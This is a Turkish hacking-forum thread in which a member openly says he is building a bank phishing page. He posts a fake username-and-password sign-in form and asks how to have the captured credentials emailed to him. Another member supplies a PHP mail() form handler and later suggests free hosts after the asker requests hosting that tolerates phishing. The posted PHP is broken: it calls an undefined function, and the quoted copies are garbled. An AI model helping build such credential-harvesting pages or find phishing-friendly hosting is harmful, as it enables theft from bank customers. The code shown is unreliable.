Çözüldü PHP'de POST Methodu ile çektiğim verileri maile gönderme nasıl oluyor?

MRAZE1994

Katılımcı Üye
1 Ocak 2019
621
5
AZ,Lenkeran
şimdi phishing tasarlıyorum bi arkadaş banka phishingi var adam siteye post methodu ile verileri çekip maile gönderiyor peki ben post methodu zamanı action a atadığım dosyasına ne yazmalıyımki bilgileri maile yollasın PHPMailer ve.s denedim olmuyor deneyipde çalışan varsa yollarmısınız

örnek forum dosyası
<form method="POST" autocomplete="off" action="redirect.php" novalidates>
<input name="username" class="input" placeholder="Username" type="text" required>
<input name="password" class="input" placeholder="Password" type="password" required>
<button type="submit" class="primary">
<span class="label">Sign in
</span>
</button></form>

post methodundaki yonlendirilen action dosyasi yani redirect.php ne yazacamki bilgileri cekip istedigim maile yolluyucak

MRAZE1994

Katılımcı Üye
1 Ocak 2019
621
5
AZ,Lenkeran
Merhaba değerli üye, aşağıda bırakacağım videolara göz atınız. Eğer bir sonuca varamazsanız, konu altına geri dönüş yapın. Bizzat kendim yazarım o zaman.

=> https://youtu.be/UyTQ2akVHyU
=> https://youtu.be/HCyoqFVx9dk
=> https://youtu.be/-Nb4InEq3rk

1ci video denedim yandex smtp yaptim kendi hesabimdan kendime gonderdim spam dusucegini biliyordum ama gelmedi bile

Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; SMTP has a deprecated constructor in C:\wampserver\www\iletisim\mail\class.smtp.php on line 24
Mesaj Gönderilemedi
Mailer Error: Language string failed to load: [email protected]

boyle hata cikdi

bay404

Uzman üye
1 Mar 2020
1,671
42
Antalya
1ci video denedim yandex smtp yaptim kendi hesabimdan kendime gonderdim spam dusucegini biliyordum ama gelmedi bile

Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; SMTP has a deprecated constructor in C:\wampserver\www\iletisim\mail\class.smtp.php on line 24
Mesaj Gönderilemedi
Mailer Error: Language string failed to load: [email protected]

boyle hata cikdi

Merhaba değerli üye, sizin için örnek kodlama yazıp aşağıya bırakacağım.

html bölümü bu şekilde olacak ;
Kod:
<!DOCTYPE html>
<head>
<title>Form submission</title>
</head>
<body>

<form action="mail_gonder.php" method="post">
First Name: <input type="text" name="first_name"><br>
Last Name: <input type="text" name="last_name"><br>
Email: <input type="text" name="email"><br>
Message:<br><textarea rows="5" name="message" cols="30"></textarea><br>
<input type="submit" name="submit" value="Submit">
</form>

</body>
</html>
burada örnek bir form oluşturdum sizde kendi formunuzu bu tarzda oluşturabilirsiniz. Sorun burada değil zaten.

Örnek Php kodları ;
Kod:
<?php 

if (isset($_POST['submit'])) {
    $to = $_POST['email']; 
    $subject = $_POST['name'];
    $message = getRequestURI();
    $from = "[email protected]";
    $headers = "From:" . $from;

if (mail($to, $subject, $message, $headers)) {
        echo "Mail Sent.";
    }
    else {
        echo "failed";
    }
}

?>

burada if ile koşul koyduk yani submit post edilirse, bu işlemler yapılacak.. bunu deneyiniz. :))

Son düzenleme:

MRAZE1994

Katılımcı Üye
1 Ocak 2019
621
5
AZ,Lenkeran

Kod:
<!DOCTYPE html>
<head>
</head>
<body>

</form>

</body>
</html>
burada örnek bir form oluşturdum sizde kendi formunuzu bu tarzda oluşturabilirsiniz. Sorun burada değil zaten.

Örnek Php kodları ;
Kod:
<?php 

$to = $_POST['email']; 

echo "Mail Sent.";
    }
    else {
        echo "failed";
    }
}

?>

burada if ile koşul koyduk yani submit post edilirse, bu işlemler yapılacak.. bunu deneyiniz. :))

vallaha bıktım galiba sorun wampserver da çünkü yine hata aldım bu aldığım hata sık rasladığım hata

Notice: Undefined index: name in C:\wampserver\www\iletisim\mail_gonder.php on line 5

Fatal error: Uncaught Error: Call to undefined function getRequestURI() in C:\wampserver\www\iletisim\mail_gonder.php:6 Stack trace: #0 {main} thrown in C:\wampserver\www\iletisim\mail_gonder.php on line 6

bay404

Uzman üye
1 Mar 2020
1,671
42
Antalya
vallaha bıktım galiba sorun wampserver da çünkü yine hata aldım bu aldığım hata sık rasladığım hata

Notice: Undefined index: name in C:\wampserver\www\iletisim\mail_gonder.php on line 5

Fatal error: Uncaught Error: Call to undefined function getRequestURI() in C:\wampserver\www\iletisim\mail_gonder.php:6 Stack trace: #0 {main} thrown in C:\wampserver\www\iletisim\mail_gonder.php on line 6

Merhaba değerli üye, gerçek bir sunucuda aynı kodlarınızı deneyebilirsiniz. En doğru sonuç bu şekilde olacaktır. Deneme için ücretsiz siteyi "phpnet.us" sitesinden açabilirsiniz. İyi forumlar.. :mahcup:

MRAZE1994

Katılımcı Üye
1 Ocak 2019
621
5
AZ,Lenkeran
Merhaba değerli üye, gerçek bir sunucuda aynı kodlarınızı deneyebilirsiniz. En doğru sonuç bu şekilde olacaktır. Deneme için ücretsiz siteyi "phpnet.us" sitesinden açabilirsiniz. İyi forumlar.. :mahcup:

hocam bana ifast değilde başka phishinge izin veren hosting lazm yani sistemi düşük olursa sıkıntı yok ama phishinge izin versin ve somee.com veyada 00webhost dan baska x10.net fln denedim olmadi yep yeni site varmi deneyecegim 1 yillikda olsa olur

bay404

Uzman üye
1 Mar 2020
1,671
42
Antalya
hocam bana ifast değilde başka phishinge izin veren hosting lazm yani sistemi düşük olursa sıkıntı yok ama phishinge izin versin ve somee.com veyada 00webhost dan baska x10.net fln denedim olmadi yep yeni site varmi deneyecegim 1 yillikda olsa olur

Dostum "phpnet.us" sitesinde böyle bir sorun yok ama istersen bu siteye de göz atabilirsin;
Tıklayınız

MRAZE1994

Katılımcı Üye
1 Ocak 2019
621
5
AZ,Lenkeran
Dostum "phpnet.us" sitesinde böyle bir sorun yok ama istersen bu siteye de göz atabilirsin;
Tıklayınız

phpnet.us ifasnetin free hostingini kullaniyor ve ifasnet tamamile kapatiyor phishingleri yardimlariniz icin cok tesekkur ederim attigin kodlari deniyip yazarim

Kod:
<!DOCTYPE html>
<head>
</head>
<body>

</form>

</body>
</html>

Örnek Php kodları ;
Kod:
<?php 

$to = $_POST['email']; 

echo "Mail Sent.";
    }
    else {
        echo "failed";
    }
}

?>

bunu normal sunucuda denedimde çıktıda hiçbirşey çıkmadı mailde gelmedi

bunu normal sunucuda denedimde çıktıda hiçbirşey çıkmadı mailde gelmedi

smtp ile olamazmi ?

Moderatör tarafında düzenlendi:

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.